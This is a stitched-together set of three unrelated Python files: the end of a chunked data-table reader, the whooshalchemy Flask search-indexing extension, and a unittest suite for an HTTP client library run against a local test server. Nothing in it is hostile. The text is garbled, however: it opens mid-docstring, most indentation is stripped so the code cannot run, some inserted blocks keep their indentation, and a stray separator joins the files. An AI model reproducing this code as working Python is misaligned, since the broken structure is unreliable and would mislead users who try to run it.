Data of the actual data chunk and start index for the next chunk.
Example
-------
for data, index in chunk_aligned_at_events(table):
do_something(data)
show_progress(index)
'''
# Initialize variables
if not start_index:
start_index = 0
if not stop_index:
stop_index = table.shape[0]
# Limit max index
if stop_index > table.shape[0]:
stop_index = table.shape[0]
# Special case, one read is enough, data not bigger than one chunk and
# the indices are known
if start_index + chunk_size >= stop_index:
yield table.read(start=start_index, stop=stop_index), stop_index
else: # Read data in chunks, chunks do not divide events
current_start_index = start_index
while current_start_index < stop_index:
current_stop_index = min(current_start_index + chunk_size,
stop_index)
chunk = table[current_start_index:current_stop_index]
if current_stop_index == stop_index: # Last chunk
yield chunk, stop_index
break
# Find maximum non event number splitting index
event_numbers = chunk["event_number"]
last_event = event_numbers[-1]
# Search for next event number
chunk_stop_i = np.searchsorted(event_numbers,
last_event,
side="left")
yield chunk[:chunk_stop_i], current_start_index + chunk_stop_i
current_start_index += chunk_stop_i
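def _example_smc_usage(file_in, file_out):
    ''' Hedged usage sketch (added; the file names and the 'Hits' table
    name are hypothetical): filters a table chunk-wise on all cores and
    combines the per-core results into one output table. '''
    def select_odd_events(data):
        # keep rows with odd event numbers; returning a recarray makes
        # the combine step merge tables rather than histograms
        return data[data['event_number'] % 2 == 1]
    SMC(table_file_in=file_in,
        file_out=file_out,
        func=select_odd_events,
        table='Hits',
        align_at='event_number')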
if __name__ == '__main__':
pass
| |
'''
whooshalchemy flask extension
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds whoosh indexing capabilities to SQLAlchemy models for Flask
applications.
:copyright: (c) 2012 by Karl Gyllstrom
:license: BSD (see LICENSE.txt)
'''
from __future__ import with_statement
from __future__ import absolute_import
import flask_sqlalchemy as flask_sqlalchemy
import sqlalchemy
from whoosh.qparser import OrGroup
from whoosh.qparser import AndGroup
from whoosh.qparser import MultifieldParser
from whoosh.analysis import StemmingAnalyzer
import whoosh.index
from whoosh.fields import Schema
#from whoosh.fields import ID, TEXT, KEYWORD, STORED
import heapq
import os
__searchable__ = '__searchable__'
DEFAULT_WHOOSH_INDEX_NAME = 'whoosh_index'
try:
unicode
except NameError:
unicode = str
class _QueryProxy(flask_sqlalchemy.BaseQuery):
# We're replacing the model's ``query`` field with this proxy. The main
# thing this proxy does is override the __iter__ method so that results are
# returned in the order of the whoosh score to reflect text-based ranking.
def __init__(self, entities, session=None):
super(_QueryProxy, self).__init__(entities, session)
self._modelclass = self._mapper_zero().class_
self._primary_key_name = self._modelclass.whoosh_primary_key
self._whoosh_searcher = self._modelclass.pure_whoosh
# Stores whoosh results from query. If ``None``, indicates that no
# whoosh query was performed.
self._whoosh_rank = None
def __iter__(self):
''' Reorder ORM-db results according to Whoosh relevance score. '''
super_iter = super(_QueryProxy, self).__iter__()
if self._whoosh_rank is None:
# Whoosh search hasn't been run so behave as normal.
return super_iter
# Iterate through the values and re-order by whoosh relevance.
ordered_by_whoosh_rank = []
for row in super_iter:
# Push items onto heap, where sort value is the rank provided by
# Whoosh
heapq.heappush(ordered_by_whoosh_rank,
(self._whoosh_rank[unicode(getattr(row,
self._primary_key_name))], row))
def _inner():
while ordered_by_whoosh_rank:
yield heapq.heappop(ordered_by_whoosh_rank)[1]
return _inner()
def whoosh_search(self, query, limit=None, fields=None, or_=False):
'''
Execute text query on database. Results have a text-based
match to the query, ranked by the scores from the underlying Whoosh
index.
        By default, the search is executed across all of the indexed fields.
        For example, if a model lists 'title' and 'content' in
        ``__searchable__``, a query is checked against both fields, returning
        any instance whose title or content matches the query. To restrict
        the search to particular fields, populate the ``fields`` parameter
        with the desired field names.
By default, results will only be returned if they contain all of the
query terms (AND). To switch to an OR grouping, set the ``or_``
parameter to ``True``.
'''
if not isinstance(query, unicode):
query = unicode(query)
results = self._whoosh_searcher(query, limit, fields, or_)
if not results:
# We don't want to proceed with empty results because we get a
# stderr warning from sqlalchemy when executing 'in_' on empty set.
# However we cannot just return an empty list because it will not
# be a query.
# XXX is this efficient?
return self.filter(sqlalchemy.text('null'))
result_set = set()
result_ranks = {}
for rank, result in enumerate(results):
pk = result[self._primary_key_name]
result_set.add(pk)
result_ranks[pk] = rank
f = self.filter(getattr(self._modelclass,
self._primary_key_name).in_(result_set))
f._whoosh_rank = result_ranks
return f
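
# Usage sketch for ``whoosh_search`` (hypothetical ``Post`` model; assumes it
# defines ``__searchable__ = ['title', 'content']`` and has been indexed via
# ``whoosh_index(app, Post)``):
#
#   results = Post.query.whoosh_search(u'flask search', limit=10)
#   title_only = Post.query.whoosh_search(u'flask', fields=('title',))
#   any_term = Post.query.whoosh_search(u'flask search', or_=True)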
class _Searcher(object):
    ''' Assigned to a Model class as ``pure_whoosh``, which enables
    text-querying against the whoosh hit list. Also used by
    ``query.whoosh_search``. '''
def __init__(self, primary, indx):
self.primary_key_name = primary
self._index = indx
self.searcher = indx.searcher()
self._all_fields = list(set(indx.schema._fields.keys()) -
set([self.primary_key_name]))
def __call__(self, query, limit=None, fields=None, or_=False):
if fields is None:
fields = self._all_fields
group = OrGroup if or_ else AndGroup
parser = MultifieldParser(fields, self._index.schema, group=group)
return self._index.searcher().search(parser.parse(query),
limit=limit)
def whoosh_index(app, model):
''' Create whoosh index for ``model``, if one does not exist. If
the index exists it is opened and cached. '''
# gets the whoosh index for this model, creating one if it does not exist.
# A dict of model -> whoosh index is added to the ``app`` variable.
if not hasattr(app, 'whoosh_indexes'):
app.whoosh_indexes = {}
    # dict.get(key, default) evaluates _create_index eagerly even when the
    # index is already cached, so check for membership explicitly instead.
    if model.__name__ not in app.whoosh_indexes:
        _create_index(app, model)
    return app.whoosh_indexes[model.__name__]
def _get_analyzer(app, model):
analyzer = getattr(model, '__analyzer__', None)
if not analyzer and app.config.get('WHOOSH_ANALYZER'):
analyzer = app.config['WHOOSH_ANALYZER']
if not analyzer:
analyzer = StemmingAnalyzer()
return analyzer
def _create_index(app, model):
# a schema is created based on the fields of the model. Currently we only
# support primary key -> whoosh.ID, and sqlalchemy.(String, Unicode, Text)
# -> whoosh.TEXT.
if not app.config.get('WHOOSH_BASE'):
        # XXX todo: is there a better approach to handle the absence of a
# config value for whoosh base? Should we throw an exception? If
# so, this exception will be thrown in the after_commit function,
# which is probably not ideal.
app.config['WHOOSH_BASE'] = DEFAULT_WHOOSH_INDEX_NAME
# we index per model.
wi = os.path.join(app.config.get('WHOOSH_BASE'),
model.__name__)
analyzer = _get_analyzer(app, model)
schema, primary_key = _get_whoosh_schema_and_primary_key(model, analyzer)
if whoosh.index.exists_in(wi):
indx = whoosh.index.open_dir(wi)
else:
if not os.path.exists(wi):
os.makedirs(wi)
indx = whoosh.index.create_in(wi, schema)
app.whoosh_indexes[model.__name__] = indx
model.pure_whoosh = _Searcher(primary_key, indx)
model.whoosh_primary_key = primary_key
# change the query class of this model to our own
model.query_class = _QueryProxy
return indx
def _get_whoosh_schema_and_primary_key(model, analyzer):
schema = {}
primary = None
searchable = set(model.__searchable__)
for field in model.__table__.columns:
if field.primary_key:
schema[field.name] = whoosh.fields.ID(stored=True, unique=True)
primary = field.name
if field.name in searchable and isinstance(field.type,
(sqlalchemy.types.Text, sqlalchemy.types.String,
sqlalchemy.types.Unicode)):
schema[field.name] = whoosh.fields.TEXT(analyzer=analyzer)
return Schema(**schema), primary
def _after_flush(app, changes):
# Any db updates go through here. We check if any of these models have
# ``__searchable__`` fields, indicating they need to be indexed. With these
# we update the whoosh index for the model. If no index exists, it will be
# created here; this could impose a penalty on the initial commit of a
# model.
bytype = {} # sort changes by type so we can use per-model writer
for change in changes:
update = change[1] in ('update', 'insert')
if hasattr(change[0].__class__, __searchable__):
bytype.setdefault(change[0].__class__.__name__, []).append((update,
change[0]))
for model, values in bytype.items():
index = whoosh_index(app, values[0][1].__class__)
with index.writer() as writer:
primary_field = values[0][1].pure_whoosh.primary_key_name
searchable = values[0][1].__searchable__
for update, v in values:
if update:
attrs = {}
for key in searchable:
try:
attrs[key] = unicode(getattr(v, key))
except AttributeError:
raise AttributeError('{0} does not have {1} field {2}'
.format(model, __searchable__, key))
attrs[primary_field] = unicode(getattr(v, primary_field))
writer.update_document(**attrs)
else:
writer.delete_by_term(primary_field, unicode(getattr(v,
primary_field)))
flask_sqlalchemy.models_committed.connect(_after_flush)
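
# End-to-end sketch of wiring the extension into an app (hypothetical names;
# assumes a Flask app configured with flask_sqlalchemy):
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config['WHOOSH_BASE'] = '/tmp/whoosh'
#   db = flask_sqlalchemy.SQLAlchemy(app)
#
#   class Post(db.Model):
#       __searchable__ = ['title', 'body']   # fields to index
#       id = db.Column(db.Integer, primary_key=True)
#       title = db.Column(db.Unicode)
#       body = db.Column(db.UnicodeText)
#
#   whoosh_index(app, Post)  # create/open the index and install _QueryProxy
#   # After each commit, _after_flush keeps the whoosh index in sync.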
import unittest
from multiprocessing import Process
import requests
import json
import time
from ..exchange import Exchange
from ..config import DefaultConfig
from ..auth import Auth
from ..error import TimeoutError,ResponseError
from grabbag.list import first_not_none
from grabbag.dict import merge
TEST_METHODS = ('GET','POST','PUT','DELETE')
TEST_DATAS = ('','{"json":true}','<html></html>')
TEST_PARAMS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
TEST_HEADERS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
class TestAuth(Auth): pass
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = '/blah/v1'
sub_path = 'mirror/create'
def process_response(self, response): return json.loads(response.content)
class TestExchange2(Exchange): pass
def webserver():
from bottle import route, run, request, error
@route('/blah/v1/mirror/:extra', method='GET')
def get(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='POST')
def post(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='PUT')
def putextra(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='DELETE')
def delete(extra): return mirror(extra)
@error(404)
def bad(code): return 'bad'
@route('/sleep/:ms', method='GET')
def sleep(ms):
time.sleep(int(ms)/1000.0)
return json.dumps( {'sleep': ms} )
def mirror(extra):
return json.dumps( dict(
method = request.method,
protocol = request.urlparts[0],
domain = request.urlparts[1],
path = request.urlparts[2],
body = request.body.getvalue(),
params = dict((k,request.query.getall(k)) for k in request.query.keys()),
headers = dict((k,request.headers.get(k)) for k in request.headers.keys())))
run(host='localhost', port=8087)
class ExchangeTest(unittest.TestCase):
@classmethod
def setUpClass(kls):
kls.webserver_process = Process(target=webserver)
kls.webserver_process.start()
working = False
while not working:
time.sleep(0.02)
try:
working = requests.get('http://localhost:8087/blah/v1/mirror/whatever').status_code == 200
            except requests.exceptions.ConnectionError: pass
@classmethod
def tearDownClass(kls):
kls.webserver_process.terminate()
kls.webserver_process.join()
def setUp(self): pass
def tearDown(self): pass
def _test_expected_attr(self, attr, possibles, default=None, add_none=True, final_possibles=None):
final_possibles = list(final_possibles or possibles)
if add_none:
possibles = [None] + list(possibles)
final_possibles = [None] + list(final_possibles)
for k,x in zip(possibles,final_possibles):
for l in (True, False):
for m,z in zip(possibles,final_possibles):
for n,w in zip(possibles, final_possibles):
class TestExchangeX(TestExchange2): pass
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
auth = Auth()
if n is not None: setattr(auth,attr,n)
self.assertEquals(default if n is None else n, getattr(auth,attr,None))
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals(first_not_none( (z,x,w), default), getattr(ex, attr))
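
    # Reading the nested loops above: an Exchange resolves each attribute by
    # precedence -- constructor kwarg first, then the Exchange subclass
    # attribute (plain value or callable), then the Auth object's attribute,
    # then the default -- which is what first_not_none((z, x, w), default)
    # asserts against.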
def _test_additive_attr(self, attr, possibles, add_none=True):
if add_none:
possibles = [None] + list(possibles)
for k in possibles:
for l in (True,False):
for m in possibles:
for n in possibles:
class TestExchangeX(TestExchange): pass
auth = Auth()
setattr(auth,attr,n)
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals( merge({}, n or {}, k or {}, m or {}), getattr(ex, attr))
def test_calcs(self):
self._test_expected_attr('method', TEST_METHODS, DefaultConfig.method)
self._test_expected_attr('protocol', ('http','https'), DefaultConfig.protocol)
self._test_expected_attr('domain', ('app.localhost','app.hubspotqa.com','app.hubspot.com'), add_none=False)
self._test_expected_attr('base_path', ('/v1/whatever/','/base/path','') , None, final_possibles=('v1/whatever','base/path',None))
self._test_expected_attr('sub_path', ('/create','','show/'), None, final_possibles=('create',None,'show'))
self._test_expected_attr('data', TEST_DATAS)
self._test_expected_attr('timeout', (10,20,30), DefaultConfig.timeout)
self._test_expected_attr('max_retries', (0,1,2), DefaultConfig.max_retries)
        ###TODO: support multiple values per key in params (i.e. MultiDict semantics)
self._test_additive_attr('params', TEST_PARAMS)
self._test_additive_attr('headers', TEST_HEADERS)
def test_timeouts(self):
self.assertTrue(TestExchange(TestAuth(), timeout=0.5).result)
with self.assertRaises(TimeoutError):
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001).result)
def test_methods(self):
for method in TEST_METHODS:
self.assertEquals(method, TestExchange(TestAuth(), method=method).result['method'])
def test_datas(self):
for data in TEST_DATAS:
self.assertEquals(data, TestExchange(TestAuth(), data=data).result['body'])
def test_sub_paths(self):
for sub_path in ('create','show','list'):
self.assertEquals("/blah/v1/mirror/%s"%sub_path, TestExchange(TestAuth(), base_path='blah/v1/mirror', sub_path=sub_path).result['path'])
def test_params(self):
for params in TEST_PARAMS:
self.assertEquals(dict((k,[v]) for k,v in params.iteritems()), TestExchange(TestAuth(), params=params).result['params'])
def test_headers(self):
for headers in TEST_HEADERS:
self.assertEquals(dict((k.upper(),v) for k,v in headers.iteritems()), dict((k.upper(),v) for k,v in TestExchange(TestAuth(), headers=headers).result['headers'].iteritems() if k.lower() in headers.keys()))
def test_max_retries(self):
for max_retries in (0,1,2):
try:
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001, max_retries=max_retries).result)
except TimeoutError as err:
self.assertEquals(max_retries+1, len(err.exchange.failures))
for f in err.exchange.failures:
self.assertTrue(isinstance(f, TimeoutError))
continue
except:
self.fail("should not get to here")
self.fail("should not get to here")
def test_bulk_exchange(self):
count = 5
for async in (True,False):
exs = [TestExchange(TestAuth(), params={'i':str(i), 'async':str(async)}) for i in xrange(count)]
for ex,i in zip(Exchange.async_exchange(exs), xrange(count)):
self.assertEquals([str(i)],ex.result['params']['i'])
self.assertEquals([str(async)],ex.result['params']['async'])
def test_different_auth(self):
class TestAuth1(Auth):
def params(self): return {'key1':'value1'}
class TestAuth2(Auth):
def params(self): return {'key2':'value2'}
class TestExchange1(Exchange): pass
class TestExchange2(Exchange): pass
self.assertEquals({'key1':'value1'},TestExchange1(TestAuth1()).params)
self.assertEquals({'key2':'value2'},TestExchange1(TestAuth2()).params)
def test_bad_url(self):
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = 'bad'
ok404 = True
def process_error(self, error, response):
if response is not None:
if response.status_code==404:
return self.ok404
return False
def process_response(self, response): return response.text
self.assertEquals('bad',TestExchange(TestAuth()).result)
TestExchange.ok404=False
with self.assertRaises(ResponseError):
self.assertTrue(TestExchange(TestAuth()).result)